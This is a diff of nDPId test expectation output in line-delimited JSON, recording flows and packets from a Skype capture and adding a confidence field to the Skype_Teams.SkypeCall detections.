 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1431970650910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970650910,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0eB9AAEAG4PLAqAEinTeCsMglnFZwrI8wwvNN4YAQECz\/hAAAAQEICj4xxe1OqL1k"}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651380,"flow_last_seen":1431970651380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970651380,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.147","src_port":51238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -285,102 +285,102 @@
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1431970651677,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970651677,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0CgxAAEAGtOPAqAEib91KLcgoAbtIes+zDU2rDIAQECxN5QAAAQEICj4xyOdNh63L"}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAAA9fnAAAEARsRvAqAEi1cezkjLdgQkAKdgxevUC7H9CpX1vDFjUgifamALKVmn9IG\/Fgz6DNfXKD8OP"}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":680,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":681,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.160","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":681,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/x4wAAEARZ+\/AqAEi1cezoDLdnF4AKxOyevcCGvABkprWeh8EUhOC0BCTnmpfRyuj2xsq6jfI1V+MUC4="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.160","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.160","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":682,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":682,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1mAEAAEART6jAqAEinTg0DDLdnF8AIfBgevkCw9fuW226FZ\/i0VkBrMngLZ\/OvlepsQ=="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":682,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.12","src_port":13021,"dst_port":40031,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAABAT+gAAEAREWjAqAEiQAQXjzLdnFIALKj4evsCuV\/AUAbJFwXr2TpK\/p9BHGpZ+kg1tywBGmcFc5l3l+UA"}
-00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00656{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":683,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1431970651850,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"ts_msec":1431970651850,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5DD0AAEARIzfAqAEi1cezrjLdnFkAJTHjev0CDsFSgVTjU3l7SB\/6pLcIO\/MFhUO5HKYdIt4="}
-00634{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":684,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970651850,"flow_last_seen":1431970651850,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1431970651850,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.174","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":699,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652388,"flow_last_seen":1431970652388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970652388,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.176","src_port":51241,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":1,"flow_last_seen":1431970652388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970652388,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw4RAAEAGlYHAqAEinTeCsMgpAbtXW5NMAAAAALAC\/\/+W4QAAAgQFtAEDAwUBAQgKPjHLqwAAAAAEAgAA"}
 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":701,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1431970652513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970652513,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYgqdN4KwwKgBIgG7yCm78+IiV1uTTaASOJDDlAAAAgQFrAQCCApOqL71PjHLqwEDAwk="}
 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":702,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1431970652513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1431970652513,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0+sxAAEAGXkXAqAEinTeCsMgpAbtXW5NNu\/PiI4AQECwaQwAAAQEICj4xzCdOqL71"}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyWSMAAEARpePAqAEib91KDTLdnEkAHvqKev8C0IwzOBgB3UEKOkJTX5CI9Vwhwg=="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":707,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.13","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":708,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":708,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1DNUAAEAR8g3AqAEib91KLjLdnFsAIUKoewECUhceSedyogxjoY07gc663Yk4liOtLw=="}
-00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":708,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.46","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":709,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.174","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":709,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6I1wAAEARDKfAqAEinTfrrjLdnFMAJnmaewMCB1Y35rB9hiYgpWTMLw7QXUk3fDnH35+GDlnt"}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.174","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":709,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.174","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8IkgAAEARdlHAqAEiQTffFjLdnEkAKNsyewUCeMezn62nslRHzPMr8rZBDWA5jghU5oMMawkbl98="}
-00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.22","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1431970652859,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"ts_msec":1431970652859,"pkt":"0NQSxnP1PBXCt3IOCABFAAA2CdUAAEAR8anAqAEib91NkTLdnFgAIo9yewcCvaqOUinZ3k4PRY4yBX99xmfLU0z2qZs="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970652859,"flow_last_seen":1431970652859,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1431970652859,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
